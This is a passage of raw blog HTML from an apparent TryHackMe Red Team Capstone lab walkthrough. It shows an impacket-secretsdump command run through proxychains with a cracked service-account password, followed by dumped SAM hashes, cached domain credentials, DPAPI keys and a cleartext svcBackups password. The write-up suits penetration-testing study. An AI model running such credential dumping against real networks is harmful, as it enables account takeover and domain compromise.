srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?w=1024&amp;ssl=1 1024w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?resize=300%2C212&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?resize=768%2C544&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><code>Hashcat<\/code> cracked only one of the hashes, the one for the service account <code>svcScanning<\/code>.<\/p>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09112fc7&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09112fc7\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"624\" data-attachment-id=\"496\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206165226\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?fit=1686%2C1028&amp;ssl=1\" data-orig-size=\"1686,1028\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206165226\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?fit=1024%2C624&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=1024%2C624&#038;ssl=1\" alt=\"\" class=\"wp-image-496\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=1024%2C624&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=300%2C183&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=768%2C468&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?resize=1536%2C937&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206165226.png?w=1686&amp;ssl=1 1686w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Using this account, we can RDP into the Server machines.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09113587&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09113587\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"499\" data-attachment-id=\"497\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206170041\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?fit=1706%2C831&amp;ssl=1\" data-orig-size=\"1706,831\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206170041\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?fit=1024%2C499&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=1024%2C499&#038;ssl=1\" alt=\"\" class=\"wp-image-497\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=1024%2C499&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=300%2C146&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=768%2C374&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?resize=1536%2C748&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206170041.png?w=1706&amp;ssl=1 1706w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"30-compromising-the-corpdc-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Compromising the CORPDC<\/mark><\/h2>\n\n\n\n<p>Service accounts have more privileges than normal domain users. With the <code>svcScanning<\/code> account, we can carry out further attacks such as dumping secrets from the AD machines.<\/p>\n\n\n\n<p>For this attack, we will make use of the <code>Impacket-secretsdump<\/code> tool. 
Let&#8217;s try to dump hashes on the <code>Server1<\/code> machine.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">proxychains<\/span><span style=\"color: 
#BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-secretsdump<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">corp.thereserve.loc\/svcScanning:<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Password1!<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">@10.200.113.31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> config file found: \/etc\/proxychains.conf<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span 
style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Strict chain  ...  127.0.0.1:1080  ...  10.200.113.31:445  ...  OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Service RemoteRegistry is <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> stopped state<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Starting service RemoteRegistry<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Target system bootKey: 0x90cf5c2fdcffe9d25ff0ed9b3d14a846<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Dumping local SAM hashes <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">uid:rid:lmhash:nthash<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Administrator:500:aad3b435b51404eeaad3b435b51404ee:e2c7044e93cf7e4d8697582207d6785c:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#FFCB6B\">THMSetup:1008:aad3b435b51404eeaad3b435b51404ee:d37f688ca5172b5976b714a8b54b40f4:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">HelpDesk:1009:aad3b435b51404eeaad3b435b51404ee:f6ca2f672e731b37150f0c5fa8cfafff:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">sshd:1010:aad3b435b51404eeaad3b435b51404ee:48c62694fd5bbca286168e2199f9af49:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Dumping cached domain logon information <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">domain\/username:hash<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP.THERESERVE.LOC\/Administrator:$DCC2$10240#Administrator#b08785ec00370a4f7d02ef8bd9b798ca:<\/span><span style=\"color: #BABED8\"> (2023-04-01 <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:13:47<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP.THERESERVE.LOC\/svcScanning:$DCC2$10240#svcScanning#d53a09b9e4646451ab823c37056a0d6b:<\/span><span style=\"color: #BABED8\"> (2024-02-06 <\/span><span style=\"color: #F78C6C\">22<\/span><span style=\"color: #C3E88D\">:58:50<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Dumping LSA Secrets<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> $MACHINE.ACC <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP\\SERVER1$:aes256-cts-hmac-sha1-96:60db0f5bd8abfee643cae3060ed708e3158426f253e2711f9be068245cee19ac<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP\\SERVER1$:aes128-cts-hmac-sha1-96:3e61a6a2a9f25ada7f7ebd64a3384a9a<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#FFCB6B\">CORP\\SERVER1$:des-cbc-md5:023dfdfbcd51b6a8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP\\SERVER1$:plain_password_hex:323da71a677b83100ef8a4555d87c9ed4af979b405f786814bdecc168e16f82b86cf247e0b03bbe01c09b9fa98d5866fe4a09d3fd99a98b4543bdb36fbbe742c05b0e9b4f6795313db4f68c33cc6bc2330a1c4d75311ede155b90f11ebe5ff8409989636083928daf72ecd7f807e47b4eea7741d5ac3c4141ffad6e5663a19a1660a562a0aa72031d25f1229eb4a445016b8a8b7614ed559b78ef9334dcf6dd9442a1ff43d7a3b1a99b4d74906f3b99666a4d277190d06bb76c6905a9fdf03d7a1272903fce0f5c1c7ed7cee1a9332123ffff71fc3d1de00db45845270842b4b33415df5b524e6f0bf1beac6bdf2fb2a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CORP\\SERVER1$:aad3b435b51404eeaad3b435b51404ee:ab478e460aa37786571a4d13497c2f47:::<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> DPAPI_SYSTEM <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">dpapi_machinekey:0xb4cfb5032a98c1b279c92264915da1fd3d8b1a0d<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">dpapi_userkey:0x3cddfc2ba786e51edf1c732a21ffa1f3d19aa382<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> NL$KM <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0000<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">8<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">D2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8<\/span><span style=\"color: #C3E88D\">E<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">67<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">54<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">58<\/span><span style=\"color: 
#BABED8\"> <\/span><span style=\"color: #F78C6C\">89<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B1<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">C9<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">53<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B9<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5<\/span><span style=\"color: #C3E88D\">B<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">46<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">A2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">66<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">...gTX...S.[F..f<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0010<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">D4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #C3E88D\">B<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">95<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">80<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">92<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">67<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">78<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">B7<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: 
#BABED8\"> <\/span><span style=\"color: #C3E88D\">F9<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">A5<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">55<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B7<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">A3<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">.<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #82AAFF\">...<\/span><span style=\"color: #BABED8\">}<\/span><span style=\"color: #FFCB6B\">gx...-.U..<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0020<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">61<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">86<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">95<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">85<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">43<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">86<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">E3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">9<\/span><span style=\"color: #C3E88D\">E<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">C4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#F78C6C\">91<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CF<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">9<\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5<\/span><span style=\"color: #C3E88D\">B<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">a.M...C........[<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0030<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">D8<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">BB<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">D3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">41<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">E0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">D8<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">66<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">19<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">75<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">A2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">D1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">B2<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: 
......A..f=.u...">
#C3E88D\">......A..f=.u...<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> _SC_SYNC <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Cleaning up... <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Stopping service RemoteRegistry<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>There are a couple of things from this output that are of most interest to us:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The Administrator&#8217;s NTLM hash<\/li>\n\n\n\n<li>The cleartext password for the <code>svcBackups<\/code> account<\/li>\n<\/ul>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09113d4c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09113d4c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"77\" data-attachment-id=\"498\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206172945\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?fit=1674%2C126&amp;ssl=1\" data-orig-size=\"1674,126\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206172945\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?fit=1024%2C77&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=1024%2C77&#038;ssl=1\" alt=\"\" class=\"wp-image-498\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=1024%2C77&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=300%2C23&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=768%2C58&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?resize=1536%2C116&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206172945.png?w=1674&amp;ssl=1 1674w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091142d9&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091142d9\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"869\" height=\"141\" data-attachment-id=\"499\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206173005\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?fit=869%2C141&amp;ssl=1\" data-orig-size=\"869,141\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" 